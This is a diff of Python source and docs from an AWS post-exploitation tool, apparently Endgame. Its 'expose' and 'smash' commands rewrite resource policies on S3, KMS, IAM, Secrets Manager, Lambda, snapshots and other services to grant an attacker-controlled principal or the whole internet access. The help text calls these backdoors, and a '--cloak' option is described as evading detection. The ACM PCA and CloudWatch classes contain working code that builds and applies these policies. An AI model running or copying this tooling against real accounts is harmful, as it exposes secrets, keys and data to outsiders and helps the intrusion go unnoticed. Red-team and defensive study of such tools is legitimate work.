import logging
import click
import boto3
from policy_sentry.util.arns import (
parse_arn_for_resource_type,
get_resource_path_from_arn,
)
from endgame import set_log_level
from endgame.exposure_via_resource_policies import glacier_vault, sqs, lambda_layer, lambda_function, kms, cloudwatch_logs, efs, s3, \
sns, iam, ecr, secrets_manager, ses, elasticsearch, acm_pca
from endgame.exposure_via_sharing_apis import rds_snapshots, ebs_snapshots, ec2_amis
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared import constants, utils
from endgame.shared.validate import (
click_validate_supported_aws_service,
click_validate_user_or_principal_arn,
)
from endgame.shared.response_message import ResponseMessage
logger = logging.getLogger(__name__)
END = "\033[0m"
GREY = "\33[90m"
CBLINK = '\33[5m'
CBLINK2 = '\33[6m'
@click.command(name="expose", short_help="Surgically expose resources by modifying resource policies to include backdoors to a rogue attacker-controlled IAM principal or to the internet.")
@click.option(
"--name",
"-n",
type=str,
required=True,
help="Specify the name of your resource",
)
@click.option(
"--evil-principal",
"-e",
type=str,
required=True,
help="Specify the name of your resource",
callback=click_validate_user_or_principal_arn,
envvar="EVIL_PRINCIPAL"
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--service",
"-s",
type=click.Choice(constants.SUPPORTED_AWS_SERVICES),
required=False,
help="The AWS service in question",
callback=click_validate_supported_aws_service,
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region",
envvar="AWS_REGION"
)
@click.option(
"--dry-run",
"-d",
is_flag=True,
default=False,
help="Dry run, no modifications",
)
@click.option(
"--undo",
"-u",
is_flag=True,
default=False,
help="Undo the previous modifications and leave no trace",
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def expose(name, evil_principal, profile, service, region, dry_run, undo, cloak, verbosity):
"""
Surgically expose resources by modifying resource policies to include backdoors to a rogue attacker-controlled IAM principal or to the internet.
:param name: The name of the AWS resource.
:param evil_principal: The ARN of the evil principal to give access to the resource.
:param profile: The AWS profile, if using the shared credentials file.
:param service: The AWS Service in question.
:param region: The AWS region. Defaults to us-east-1
:param dry_run: Dry run, no modifications
:param undo: Undo the previous modifications and leave no trace
:param cloak: Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.
:param verbosity: Set log verbosity.
:return:
"""
set_log_level(verbosity)
# User-supplied arguments like `cloudwatch` need to be translated to the IAM name like `logs`
provided_service = service
service = utils.get_service_translation(provided_service=service)
# Get Boto3 clients
client = get_boto3_client(profile=profile, service=service, region=region, cloak=cloak)
sts_client = get_boto3_client(profile=profile, service="sts", region=region, cloak=cloak)
# Get the current account ID
current_account_id = get_current_account_id(sts_client=sts_client)
if evil_principal.strip('"').strip("'") == "*":
principal_type = "internet-wide access"
principal_name = "*"
else:
principal_type = parse_arn_for_resource_type(evil_principal)
principal_name = get_resource_path_from_arn(evil_principal)
response_message = expose_service(provided_service=provided_service, region=region, name=name, current_account_id=current_account_id, client=client, dry_run=dry_run, evil_principal=evil_principal, undo=undo)
if undo and not dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
elif undo and dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
elif not undo and dry_run:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
else:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
if verbosity >= 1:
print_diff_messages(response_message=response_message, verbosity=verbosity)
def expose_service(
provided_service: str,
region: str,
name: str,
current_account_id: str,
client: boto3.Session.client,
undo: bool,
dry_run: bool,
evil_principal: str
) -> ResponseMessage:
"""Expose a resource from an AWS Service. You can call this function directly."""
service = provided_service
resource = None
# fmt: off
if service == "acm-pca":
resource = acm_pca.AcmPrivateCertificateAuthority(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ecr":
resource = ecr.EcrRepository(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "efs" or service == "elasticfilesystem":
resource = efs.ElasticFileSystem(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "elasticsearch" or service == "es":
resource = elasticsearch.ElasticSearchDomain(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "glacier":
resource = glacier_vault.GlacierVault(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "iam":
resource = iam.IAMRole(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "kms":
resource = kms.KmsKey(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "lambda":
resource = lambda_function.LambdaFunction(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "lambda-layer":
resource = lambda_layer.LambdaLayer(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "logs" or service == "cloudwatch":
resource = cloudwatch_logs.CloudwatchResourcePolicy(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "s3":
resource = s3.S3Bucket(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "secretsmanager":
resource = secrets_manager.SecretsManagerSecret(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ses":
resource = ses.SesIdentityPolicy(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "sns":
resource = sns.SnsTopic(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "sqs":
resource = sqs.SqsQueue(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "rds":
resource = rds_snapshots.RdsSnapshot(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ebs":
resource = ebs_snapshots.EbsSnapshot(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ec2-ami":
resource = ec2_amis.Ec2Image(name=name, client=client, current_account_id=current_account_id, region=region)
# fmt: on
if undo and not dry_run:
response_message = resource.undo(evil_principal=evil_principal)
elif dry_run and not undo:
response_message = resource.add_myself(evil_principal=evil_principal, dry_run=dry_run)
elif dry_run and undo:
response_message = resource.undo(evil_principal=evil_principal, dry_run=dry_run)
else:
response_message = resource.add_myself(evil_principal=evil_principal, dry_run=False)
return response_message
def print_diff_messages(response_message: ResponseMessage, verbosity: int):
if verbosity >= 2:
utils.print_grey(f"Old statement IDs: {response_message.original_policy_sids}")
utils.print_grey(f"Updated statement IDs: {response_message.updated_policy_sids}")
# TODO: This output format works for exposure_via_resource_policies, not necessarily for exposure_via_sharing_apis.
if response_message.added_sids:
logger.debug("Statements are being added")
diff = response_message.added_sids
utils.print_yellow(f"\t+ Resource: {response_message.victim_resource_arn}")
utils.print_green(f"\t++ (New statements): {', '.join(diff)}")
utils.print_green(f"\t++ (Evil Principal): {response_message.evil_principal}")
elif len(response_message.updated_policy_sids) == len(response_message.original_policy_sids):
utils.print_yellow(f"\t* Resource: {response_message.victim_resource_arn}")
utils.print_yellow(f"\t** (No new statements)")
else:
logger.debug("Statements are being removed")
diff = response_message.removed_sids
utils.print_yellow(f"\t- Resource: {response_message.victim_resource_arn}")
utils.print_red(f"\t-- Statements being removed: {', '.join(diff)}")
if verbosity >= 3:
utils.print_grey("Original policy:")
utils.print_grey(json.dumps(response_message.original_policy))
utils.print_grey("New policy:")
utils.print_grey(json.dumps(response_message.updated_policy))

View File

@ -0,0 +1,124 @@
"""
List exposable resources
"""
import logging
import click
from endgame import set_log_level
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared.validate import click_validate_supported_aws_service, click_validate_comma_separated_resource_names, \
click_validate_comma_separated_excluded_services
from endgame.shared.resource_results import ResourceResults
from endgame.shared import constants
logger = logging.getLogger(__name__)
@click.command(name="list-resources", short_help="List all resources that can be exposed via Endgame.")
@click.option(
"--service",
"-s",
type=str,
required=True,
help=f"The AWS service in question. Valid arguments: {', '.join(constants.SUPPORTED_AWS_SERVICES)}",
callback=click_validate_supported_aws_service,
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region. Set to 'all' to iterate through all regions.",
envvar="AWS_REGION"
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"--exclude",
"-e",
"excluded_names",
type=str,
default="",
help="A comma-separated list of resource names to exclude from results",
envvar="EXCLUDED_NAMES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"--excluded-services",
type=str,
default="",
help="A comma-separated list of services to exclude from results",
envvar="EXCLUDED_SERVICES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def list_resources(service, profile, region, cloak, excluded_names, excluded_services, verbosity):
"""
List AWS resources to expose.
"""
set_log_level(verbosity)
# User-supplied arguments like `cloudwatch` need to be translated to the IAM name like `logs`
user_provided_service = service
# Get the boto3 clients
sts_client = get_boto3_client(profile=profile, service="sts", region="us-east-1", cloak=cloak)
current_account_id = get_current_account_id(sts_client=sts_client)
if user_provided_service == "all" and region == "all":
logger.critical("'--service all' and '--region all' detected; listing all resources across all services in the "
"account. This might take a while - about 5 minutes.")
elif region == "all":
logger.debug("'--region all' selected; listing resources across the entire account, so this might take a while")
else:
pass
if user_provided_service == "all":
logger.debug("'--service all' selected; listing resources in ARN format to differentiate between services")
resource_results = ResourceResults(
user_provided_service=user_provided_service,
user_provided_region=region,
current_account_id=current_account_id,
profile=profile,
cloak=cloak,
excluded_names=excluded_names,
excluded_services=excluded_services
)
results = resource_results.resources
# Print the results
if len(results) == 0:
logger.warning("There are no resources given the criteria provided.")
else:
# If you provide --service all, then we will list the ARNs to differentiate services
if user_provided_service == "all":
logger.debug("'--service all' selected; listing resources in ARN format to differentiate between services")
for resource in results:
if resource.name not in excluded_names:
print(resource.arn)
else:
logger.debug(f"Excluded: {resource.name}")
else:
logger.debug("Listing resources by name")
for resource in results:
if resource.name not in excluded_names:
print(resource.name)
else:
logger.debug(f"Excluded: {resource.name}")

191
endgame/command/smash.py Normal file
View File

@ -0,0 +1,191 @@
"""
Smash your AWS Account to pieces by exposing massive amounts of resources to a rogue principal or to the internet
"""
import logging
import click
import boto3
from policy_sentry.util.arns import (
parse_arn_for_resource_type,
get_resource_path_from_arn,
)
from endgame import set_log_level
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared.validate import click_validate_supported_aws_service, click_validate_user_or_principal_arn, click_validate_comma_separated_resource_names
from endgame.shared import utils, constants, scary_warnings
from endgame.shared.resource_results import ResourceResults
from endgame.command.expose import expose_service
from endgame.shared.response_message import ResponseMessage
logger = logging.getLogger(__name__)
END = "\033[0m"
@click.command(name="smash", short_help="Smash your AWS Account to pieces by exposing massive amounts of resources to a"
" rogue principal or to the internet")
@click.option(
"--service",
"-s",
type=str,
required=True,
help=f"The AWS service in question. Valid arguments: {', '.join(constants.SUPPORTED_AWS_SERVICES)}",
callback=click_validate_supported_aws_service,
)
@click.option(
"--evil-principal",
"-e",
type=str,
required=True,
help="Specify the name of your resource",
callback=click_validate_user_or_principal_arn,
envvar="EVIL_PRINCIPAL"
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region. Set to 'all' to iterate through all regions.",
envvar="AWS_REGION"
)
@click.option(
"--dry-run",
"-d",
is_flag=True,
default=False,
help="Dry run, no modifications",
)
@click.option(
"--undo",
"-u",
is_flag=True,
default=False,
help="Undo the previous modifications and leave no trace",
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"--exclude",
"-e",
"excluded_names",
type=str,
default="",
help="A comma-separated list of resource names to exclude from results",
envvar="EXCLUDED_NAMES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"--excluded-services",
type=str,
default="",
help="A comma-separated list of services to exclude from results",
envvar="EXCLUDED_SERVICES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def smash(service, evil_principal, profile, region, dry_run, undo, cloak, excluded_names, excluded_services, verbosity):
"""
Smash your AWS Account to pieces by exposing massive amounts of resources to a rogue principal or to the internet
"""
set_log_level(verbosity)
# Get the current account ID
sts_client = get_boto3_client(profile=profile, service="sts", region="us-east-1", cloak=cloak)
current_account_id = get_current_account_id(sts_client=sts_client)
if evil_principal.strip('"').strip("'") == "*":
if not scary_warnings.confirm_anonymous_principal():
utils.print_red("User cancelled, exiting")
exit()
else:
print()
principal_type = "internet-wide access"
principal_name = "*"
else:
principal_type = parse_arn_for_resource_type(evil_principal)
principal_name = get_resource_path_from_arn(evil_principal)
results = []
user_provided_service = service
if user_provided_service == "all" and region == "all":
utils.print_red("--service all and --region all detected; listing all resources across all services in the "
"account. This might take a while - about 5 minutes.")
elif region == "all":
logger.debug("'--region all' selected; listing resources across the entire account, so this might take a while")
else:
pass
if user_provided_service == "all":
logger.debug("'--service all' selected; listing resources in ARN format to differentiate between services")
resource_results = ResourceResults(
user_provided_service=user_provided_service,
user_provided_region=region,
current_account_id=current_account_id,
profile=profile,
cloak=cloak,
excluded_names=excluded_names,
excluded_services=excluded_services
)
results = resource_results.resources
if undo and not dry_run:
utils.print_green("UNDO BACKDOOR:")
elif dry_run and not undo:
utils.print_red("CREATE BACKDOOR (DRY RUN):")
elif dry_run and undo:
utils.print_green("UNDO BACKDOOR (DRY RUN):")
else:
utils.print_red("CREATE_BACKDOOR:")
for resource in results:
if resource.name not in excluded_names:
# feed the name, region, and translated_service based on what it is for each resource
name = resource.name
region = resource.region
translated_service = utils.get_service_translation(provided_service=resource.service)
client = get_boto3_client(profile=profile, service=translated_service, region=region, cloak=cloak)
response_message = smash_resource(service=resource.service, region=region, name=name,
current_account_id=current_account_id,
client=client, undo=undo, dry_run=dry_run, evil_principal=evil_principal)
if undo and not dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
elif undo and dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
elif not undo and dry_run:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
else:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
else:
logger.debug(f"Excluded: {resource.arn}")
def smash_resource(
service: str,
region: str,
name: str,
current_account_id: str,
client: boto3.Session.client,
undo: bool,
dry_run: bool,
evil_principal: str,
) -> ResponseMessage:
response_message = expose_service(provided_service=service, region=region, name=name,
current_account_id=current_account_id,
client=client, undo=undo, dry_run=dry_run, evil_principal=evil_principal)
return response_message

View File

@ -0,0 +1,18 @@
# Exposure via AWS RAM
By default, AWS RAM allows you to share resources with **any** AWS Account.
Supported resource types are listed in the AWS documentation [here](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html).
## Status
This exploit method is not currently implemented. Please come back later when we've implemented it.
To get notified when it is available, you can do one of the following:
1. In GitHub, select "Watch for new releases"
2. Follow the author [@kmcquade](https://twitter.com/kmcquade3) on Twitter. He will announce when this feature is available 😃
## Remediation
While you can restrict resource sharing to your own organization in AWS Organizations, the only way to disable external sharing altogether is to use AWS Service Control Policies (SCPs).

View File

View File

@ -0,0 +1,120 @@
# Resources that can be made public through resource policies
## Supported
### CloudWatch Logs
Actions:
- logs [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-resource-policy.html)
### ECR Repository
Actions:
- ecr [set-repository-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ecr/set-repository-policy.html)
### EFS
TODO: Need to confirm this can actually be shared with other accounts. Some of the doc wording leads me to think this might only be shareable to principals within an account.
Actions:
- efs [put-file-system-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/efs/put-file-system-policy.html)
### ElasticSearch
Actions:
- es [create-elasticsearch-domain](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/es/create-elasticsearch-domain.html)
- es [update-elasticsearch-domain-config](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/es/update-elasticsearch-domain-config.html)
### Glacier
Actions:
- glacier [set-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glacier/set-vault-access-policy.html)
### Lambda
Allows invoking the function
Actions:
- lambda [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-permission.html)
### Lambda layer
Actions:
- lambda [add-layer-version-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-layer-version-permission.html)
### IAM Role
Actions:
- iam [create-role](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/create-role.html)
- iam [update-assume-role-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/update-assume-role-policy.html)
### KMS Keys
Actions:
- kms [create-key](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/create-key.html)
- kms [create-grant](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/create-grant.html)
- kms [put-key-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/put-key-policy.html)
### S3
S3 buckets can be made public via policies and ACLs. ACLs can be set at bucket or object creation.
Actions:
- s3api [create-bucket](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/create-bucket.html)
- s3api [put-bucket-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-bucket-policy.html)
- s3api [put-bucket-acl](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-bucket-acl.html)
### Secrets Manager
Actions:
- secretsmanager [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/secretsmanager/put-resource-policy.html)
### SNS
Actions:
- sns [create-topic](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/create-topic.html)
- sns [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/add-permission.html)
### SQS
Actions:
- sqs [create-queue](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sqs/create-queue.html)
- sqs [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sqs/add-permission.html)
### SES
[Docs](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-policies.html)
Actions:
- ses [put-identity-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ses/put-identity-policy.html)
## Not Supported
### Backup
[Docs](https://docs.aws.amazon.com/aws-backup/latest/devguide/creating-a-vault-access-policy.html)
Actions:
- backup [put-backup-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/backup/put-backup-vault-access-policy.html)
### CloudWatch Logs (Destination Policies)
- logs [put-destination-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-destination-policy.html)
### EventBridge
Only allows sending data into an account
Actions:
- events [put-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/events/put-permission.html)
### Glue
Actions:
- glue [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glue/put-resource-policy.html)
### MediaStore
[Docs](https://docs.aws.amazon.com/mediastore/latest/ug/policies-examples-cross-acccount-full.html)
Actions:
- mediastore [put-container-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/mediastore/put-container-policy.html)
### Serverless Application Repository
Actions:
- serverlessrepo [put-application-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/serverlessrepo/put-application-policy.html)
### S3 Objects
S3 objects can be made public via ACLs. ACLs can be set at bucket or object creation.
- s3api [put-object](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-object.html)
- s3api [put-object-acl](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-object-acl.html)

View File

@ -0,0 +1,201 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_account_from_arn, get_resource_path_from_arn
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage, ResponseGetRbp
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
# ACM PCA is really anal-retentive about what policies have to look like.
# If you don't do it exactly how they say you have to, then it returns this error:
# botocore.errorfactory.InvalidPolicyException: An error occurred (InvalidPolicyException) when calling the PutPolicy
# operation: InvalidPolicy: The supplied policy does not match RAM managed permissions
# https://docs.aws.amazon.com/acm-pca/latest/userguide/pca-rbp.html
# So we have to do things our own way.
class AcmPrivateCertificateAuthority(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "acm-pca"
self.resource_type = "certificate-authority"
self.region = region
self.current_account_id = current_account_id
self.name = name
self.override_account_id_instead_of_principal = True
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.arn,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal)
@property
def arn(self) -> str:
# return self.name
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/acm-pca.html#ACMPCA.Client.get_policy
response = self.client.get_policy(ResourceArn=self.arn)
policy = json.loads(response.get("Policy"))
success = True
# This is dumb. "If either the private CA resource or the policy cannot be found, this action returns a ResourceNotFoundException."
# That means we have to set it to true, even when the resource doesn't exist. smh.
# That will only affect the expose command and not the smash command.
except self.client.exceptions.ResourceNotFoundException:
logger.debug(f"Resource {self.name} not found")
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
new_policy = json.dumps(evil_policy)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/acm-pca.html#ACMPCA.Client.put_policy
try:
self.client.put_policy(ResourceArn=self.arn, Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Add your rogue principal to the AWS resource"""
logger.debug(f"Adding {evil_principal} to {self.arn}")
# Case: principal = "arn:aws:iam::999988887777:user/mwahahaha"
if ":" in evil_principal:
evil_principal_account = get_account_from_arn(evil_principal)
# Case: Principal = * or Principal = 999988887777
else:
evil_principal_account = evil_principal
evil_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "1",
"Effect": "Allow",
"Principal": {
"AWS": evil_principal_account
},
"Action": [
"acm-pca:DescribeCertificateAuthority",
"acm-pca:GetCertificate",
"acm-pca:GetCertificateAuthorityCertificate",
"acm-pca:ListPermissions",
"acm-pca:ListTags"
],
"Resource": self.arn
},
{
"Sid": "1",
"Effect": "Allow",
"Principal": {
"AWS": evil_principal_account
},
"Action": [
"acm-pca:IssueCertificate"
],
"Resource": self.arn,
"Condition": {
"StringEquals": {
"acm-pca:TemplateArn": "arn:aws:acm-pca:::template/EndEntityCertificate/V1"
}
}
}
]
}
if dry_run:
operation = "DRY_RUN_ADD_MYSELF"
message = operation
tmp = self._get_rbp()
success = tmp.success
else:
operation = "ADD_MYSELF"
self.undo(evil_principal=evil_principal)
set_rbp_response = self.set_rbp(evil_policy=evil_policy)
success = set_rbp_response.success
message = set_rbp_response.message
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
if not dry_run:
# TODO: After you delete the policy, it still shows up in resource shares. Need to delete that.
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/acm-pca.html#ACMPCA.Client.delete_policy
# TODO: Error handling for setting policy
try:
self.client.delete_policy(ResourceArn=self.arn)
message = f"Deleted the resource policy for {self.arn}"
success = True
except botocore.exceptions.ClientError as error:
success = False
message = str(error)
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
else:
message = f"The resource policy for {self.arn} will be deleted."
success = True
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class AcmPrivateCertificateAuthorities(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "acm-pca"
self.resource_type = "certificate-authority"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_certificate_authorities")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["CertificateAuthorities"]
for resource in these_resources:
arn = resource.get("Arn")
status = resource.get("Status")
ca_type = resource.get("Type")
name = get_resource_path_from_arn(arn)
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
if status == "ACTIVE":
resources.append(list_resources_response)
return resources


@ -0,0 +1,193 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class CloudwatchResourcePolicy(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
service = "logs"
resource_type = "*"
# The Principal block in policies requires the use of account Ids (999988887777) instead of ARNs (
# "arn:aws:iam::999988887777:user/evil")
self.override_account_id_instead_of_principal = True
self.override_resource_block = self.arn
super().__init__(name, resource_type, service, region, client, current_account_id,
override_account_id_instead_of_principal=True,
override_resource_block=self.arn)
@property
def arn(self) -> str:
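        # CloudWatch Logs resource policies are not attached to a per-resource ARN
        # (see the note in CloudwatchResourcePolicies.resources below), so "*" is used here.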
return "*"
@property
def policy_exists(self):
"""Return true if the policy exists already. CloudWatch resource policies are weird so we take
a different approach"""
response = self.client.describe_resource_policies()
result = False
if response.get("resourcePolicies"):
for item in response.get("resourcePolicies"):
if item.get("policyName") == constants.SID_SIGNATURE:
result = True
return result
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
# When there is no policy, let's return an empty policy to avoid breaking things
empty_policy = constants.get_empty_policy()
policy_document = PolicyDocument(
policy=empty_policy, service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
try:
resources = {}
paginator = self.client.get_paginator("describe_resource_policies")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["resourcePolicies"]
for resource in these_resources:
name = resource.get("policyName")
tmp_policy_document = json.loads(resource.get("policyDocument"))
resources[name] = dict(policyName=name, policyDocument=tmp_policy_document)
if resources:
if resources.get(constants.SID_SIGNATURE):
policy = resources[constants.SID_SIGNATURE]["policyDocument"]
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
success = True
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Add your rogue principal to the AWS resource"""
logger.debug(f"Adding {evil_principal} to {self.arn}")
evil_policy = self.policy_document.policy_plus_evil_principal(
victim_account_id=self.current_account_id,
evil_principal=evil_principal,
resource_arn=self.arn
)
if dry_run:
operation = "DRY_RUN_ADD_MYSELF"
message = (f"The CloudWatch resource policy named {constants.SID_SIGNATURE} exists. We need to remove it"
f" first, then we will add on the new policy.")
tmp = self._get_rbp()
success = tmp.success
else:
operation = "ADD_MYSELF"
self.undo(evil_principal=evil_principal)
try:
self.client.put_resource_policy(policyName=constants.SID_SIGNATURE, policyDocument=json.dumps(evil_policy))
message = f"Added CloudWatch Resource Policy named {constants.SID_SIGNATURE}."
success = True
except botocore.exceptions.ClientError as error:
success = False
                message = str(error)
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
